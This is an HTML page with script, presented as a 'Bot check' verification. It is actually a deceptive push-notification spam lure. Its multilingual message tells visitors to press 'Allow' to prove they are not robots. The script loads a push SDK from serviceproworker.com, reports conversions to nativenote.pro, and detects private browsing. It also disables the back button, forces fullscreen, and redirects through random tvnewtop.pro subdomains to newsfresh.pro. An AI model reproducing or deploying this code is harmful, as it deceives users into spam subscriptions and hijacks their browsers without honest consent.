<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Bot check</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        html {
            background-color: #fff
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            background-color: #fff;
            color: #fff;
            font: 300 16px Helvetica, Arial, sans-serif;
            margin: 0;
            overflow: hidden;
            user-select: none
        }

        .fix,
        body {
            height: 100%;
            width: 100%
        }

        .fix {
            left: 0;
            position: fixed;
            top: 0;
            z-index: 10
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .msg {
            bottom: 1%;
            left: 0;
            margin: auto;
            max-width: 680px;
            padding-top: 100px;
            position: absolute;
            right: 0;
            width: 100%
        }

        .msg__img {
            display: block;
            max-width: 100%
        }

        .msg__tx {
            background-color: #e5916d;
            border-radius: 20px;
            left: 5px;
            padding: 11px 15px;
            position: absolute;
            right: 5px;
            text-align: center;
            top: 0
        }

        .msg__tx strong {
            font-weight: 700
        }

        .msg__bot {
            background: url(images/bot-verification/bot.png) no-repeat;
            background-size: 100%;
            bottom: 0;
            height: 260px;
            right: 0;
            width: 150px;
            z-index: -1
        }

        .logo,
        .msg__bot {
            position: absolute
        }

        .logo {
            bottom: 20px;
            right: 20px
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            color: #fff;
            height: 100%;
            left: 0;
            position: fixed;
            text-align: center;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @media (min-width:375px) {
            .msg__bot {
                width: 200px
            }
        }

        @media (min-width:425px) {
            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:700px) {
            .msg {
                padding-top: 65px
            }

            .msg__tx {
                border-radius: 33px;
                font-size: 20px;
                left: 190px;
                line-height: 1;
                padding-left: 20px;
                padding-right: 20px;
                right: auto;
                text-align: left
            }

            .isYandex .msg__tx {
                left: 152px;
                top: 25px
            }

            .msg__tx:before {
                border-color: #e5916d transparent transparent;
                border-style: solid;
                border-width: 80px 13px 0;
                content: "";
                left: -5px;
                position: absolute;
                top: 100%;
                transform: rotate(45deg) translateY(-15px);
                transform-origin: center top
            }

            .msg__bot {
                right: 60px;
                width: 260px
            }
        }

        @media (min-width:700px) and (min-height:600px) {
            .msg {
                bottom: 50%;
                padding-top: 65px;
                transform: translateY(50%)
            }
        }
    </style>
</head>

<body>
    <div class="fix"></div>
    <div class="msg"><img src="images/bot-verification/man.png" alt="images" class="msg__img">
        <div class="msg__tx"></div>
        <div class="msg__bot"></div>
    </div><img src="images/bot-verification/logo.png" alt="logo" class="logo">
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <script>
        ! function(t) {
            var o = {};

            function r(e) {
                if (o[e]) return o[e].exports;
                var n = o[e] = {
                    i: e,
                    l: !1,
                    exports: {}
                };
                return t[e].call(n.exports, n, n.exports, r), n.l = !0, n.exports
            }
            r.m = t, r.c = o, r.d = function(e, n, t) {
                r.o(e, n) || Object.defineProperty(e, n, {
                    enumerable: !0,
                    get: t
                })
            }, r.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                    value: "Module"
                }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, r.t = function(n, e) {
                if (1 & e && (n = r(n)), 8 & e) return n;
                if (4 & e && "object" == typeof n && n && n.__esModule) return n;
                var t = Object.create(null);
                if (r.r(t), Object.defineProperty(t, "default", {
                        enumerable: !0,
                        value: n
                    }), 2 & e && "string" != typeof n)
                    for (var o in n) r.d(t, o, function(e) {
                        return n[e]
                    }.bind(null, o));
                return t
            }, r.n = function(e) {
                var n = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return r.d(n, "a", n), n
            }, r.o = function(e, n) {
                return Object.prototype.hasOwnProperty.call(e, n)
            }, r.p = "", r(r.s = 2)
        }([function(e, n) {
            if (0 === "".length) {
                var t = function() {
                    void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
                };
                document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
            }
        }, , function(e, n, t) {
            "use strict";
            t.r(n);
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var r = document.title,
                    i = location.pathname + location.search;
                history.pushState(null, r, i), window.addEventListener("popstate", function() {
                    history.pushState({}, r, i)
                })
            }
            t(0);
            var s = function(n) {
                    var e = decodeURIComponent(document.cookie).split(";");
                    if (0 === e.length) return null;
                    var t = null;
                    return e.some(function(e) {
                        if (" " === e[0] && (e = e.slice(1)), e = e.split("="), n === e[0]) return t = e[1], !0
                    }), t
                },
                d = function(e, n, t, o) {
                    var r = new Date;
                    r.setTime(r.getTime() + 1e3 * t);
                    var i = "; expires=" + r.toUTCString(),
                        s = "";
                    void 0 !== o && (s = "; domain=" + o), document.cookie = e + "=" + (n || "") + s + i + "; path=/"
                },
                c = function(e, n) {
                    var t = new XMLHttpRequest;
                    t.addEventListener("readystatechange", function() {
                        if (2 === this.readyState && void 0 !== n) return n()
                    }), t.addEventListener("error", function() {
                        if (void 0 !== n) return n()
                    }), t.open("GET.html", e, !0), t.responseType = "text", t.send()
                },
                a = function(e, n, t) {
                    null == n && (n = "tracking");
                    var o = 0;
                    "tb" === e ? o = 7 : "private" === e && (o = 12);
                    var r, i, s = u();
                    null === s && (s = {}), r = void 0 === s.si1 || null === s.si1 ? "" : s.si1, i = void 0 === s.si2 || null === s.si2 ? "" : s.si2, r = r.slice(0, 32), i = i.slice(0, 32);
                    var a = "https://nativenote.pro/rpe?" + ["a=1", "s=1", "act=" + o, "src=2", "p=1000864", "st=1005506", "wd=7687", "d=tvnewtop.pro", "tpl=5", "rnd=" + Math.random(), "sbid=" + encodeURIComponent(r), "sbid2=" + encodeURIComponent(i)].join("&");
                    c(a, function() {
                        if (d(n, "1", 86400, "tvnewtop.pro"), void 0 !== t) return t()
                    })
                },
                l = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                f = function(e, n) {
                    var t = "https://newsfresh.pro/tb?h=waWQiOjEwMDA4NjQsInNpZCI6MTAwNTUwNiwid2lkIjo3Njg3LCJzcmMiOjJ9eyJ&amp;bbr=1&amp;si1=&amp;si2=";
                    if (0 !== t.length) a("tb", null, function() {
                        l({
                            a: n ? "success" : "close"
                        }), location.href = t
                    });
                    else if (void 0 !== e) return e(n)
                },
                v = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function r() {
                            return n(e)
                        }
                        if ("safari" === v.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === v.n) {
                            var i = indexedDB.open("test.html");
                            i.addEventListener("error", o), i.addEventListener("success", r)
                        } else {
                            if ("edge" === v.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== v.n && "yandex" !== v.n && "chrome" !== v.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, r, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            r = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            i = /UBrowser/.test(this.ua),
                            s = /Edge\//.test(this.ua),
                            a = null;
                        return e ? a = "opera" : n ? a = "firefox" : r ? a = "yandex" : i ? a = "uc" : s ? a = "edge" : o ? a = "chrome" : t && (a = "safari"), a
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== v.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                },
                p = v,
                m = u(),
                w = {
                    c: 0,
                    s: !0,
                    r: parseInt("0", 10),
                    next: function() {
                        var e, n = "?",
                            r = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "x", "y", "z", "1", "2", "3", "4", "5", "6", "7", "8", "9"];
                        r.forEach(function(e, n) {
                            var t = Math.floor(Math.random() * (n + 1)),
                                o = [r[t], r[n]];
                            r[n] = o[0], r[t] = o[1]
                        }), e = r.slice(0, 5).join(""), w.c++, null === m ? m = {
                            i: w.c
                        } : m.i = w.c, Object.keys(m).forEach(function(e) {
                            null !== m[e] && (n += e + "=" + m[e] + "&")
                        }), n = n.slice(0, -1), l({
                            a: "next",
                            c: w.c
                        }), location.href = "https://" + e + ".tvnewtop.pro/bot-check-3" + n
                    },
                    get can() {
                        return this.s
                    }
                };
            null !== m && void 0 !== m.i && (w.c = parseInt(m.i, 10)), 0 < w.r && (w.s = w.c < w.r);
            var g = w,
                h = function(n) {
                    if (!(void 0 !== window.navigator && void 0 !== navigator.serviceWorker && void 0 !== window.PushManager && void 0 !== window.Notification)) return n(!1, "unsupported");
                    p.m(function(e) {
                        return "private" === e ? n(!1, e) : "unknown" === e ? n(!1, e) : n(!0, "supported")
                    })
                },
                y = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (y.k = navigator.language.slice(0, 2)), void 0 === e[y.k] && (y.k = "en"), y.t = e[y.k]
                    },
                    get: function(e) {
                        return y.t[e]
                    }
                },
                b = y;

            function S(e) {
                l({
                    a: e ? "success" : "close"
                }), null !== window.opener && void 0 !== window.opener && close(), document.querySelector(".msg").classList.add("isHide"), document.querySelector(".msg__bot").classList.add("isHide"), document.querySelector(".logo").classList.add("isHide"), document.querySelector(".msgReady").classList.remove("isHide")
            }
            var R = "convert";
            if (g.can)
                if ("firefox" === p.n && 2 === location.hostname.split(".").length) g.next();
                else if (null !== s(R)) f(S, 1);
            else {
                var P = function() {
                    window.edPushSDK.push(arguments)
                };
                window.edPushSDK = window.edPushSDK || [], P("onGranted", function() {
                    d(R, "1", 604800, "tvnewtop.pro");
                    var e = "";
                    0 !== e.length ? c(e, function() {
                        f(S, 1)
                    }) : f(S, 1)
                }), P("onDenied", function() {
                    h(function(e) {
                        e && g.next()
                    })
                }), P("onClose", function() {
                    location.reload()
                }), P("onSubscribed", function() {
                    f(S, 1)
                }), P("onError", function(e) {
                    console.log(e)
                });
                var O = document.createElement("script");
                O.async = !0, O.src = "https://serviceproworker.com/v1/sdk.js?h=waWQiOjEwMDA4NjQsInNpZCI6MTAwNTUwNiwid2lkIjo3Njg3LCJzcmMiOjJ9eyJ&amp;d=tvnewtop.pro&amp;tpl=5", document.head.appendChild(O), h(function(e, n) {
                    e || ("private" === n ? a(n, null, f(S)) : f(S))
                })
            } else f(S);
            b.set({
                ru: {
                    msg: 'Нажмите <strong>"Разрешить"</strong>, чтобы подтвердить, что вы не робот',
                    msgReady: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                en: {
                    msg: 'Press <strong>"Allow"</strong> to verify, that you are not robot',
                    msgReady: "You have successfully passed the verification!<br>Now you can close the window."
                },
                fr: {
                    msg: 'Cliquez sur "Autoriser" pour confirmer que vous n\'êtes pas un robot',
                    msgReady: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    msg: 'Klicken Sie "Zulassen", wenn Sie kein Roboter sind',
                    msgReady: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    msg: 'Haga clic en "Permitir" para confirmar que no es un robot',
                    msgReady: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                uk: {
                    msg: 'Натисніть "Дозволити" щоб підтвердити, що ви не бот',
                    msgReady: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    msg: 'Kliknij "Zezwalaj", aby potwierdzić, że nie jesteś botem',
                    msgReady: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                th: {
                    msg: " คลิกอนุญาตเพื่อยืนยันว่าคุณไม่ใช่บอต",
                    msgReady: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), "yandex" === p.name && document.body.classList.add("isYandex"), document.querySelector(".msg__tx").innerHTML = b.get("msg"), document.querySelector(".msgReady__tx").innerHTML = b.get("msgReady")
        }]);
    </script>
</body>


</html>
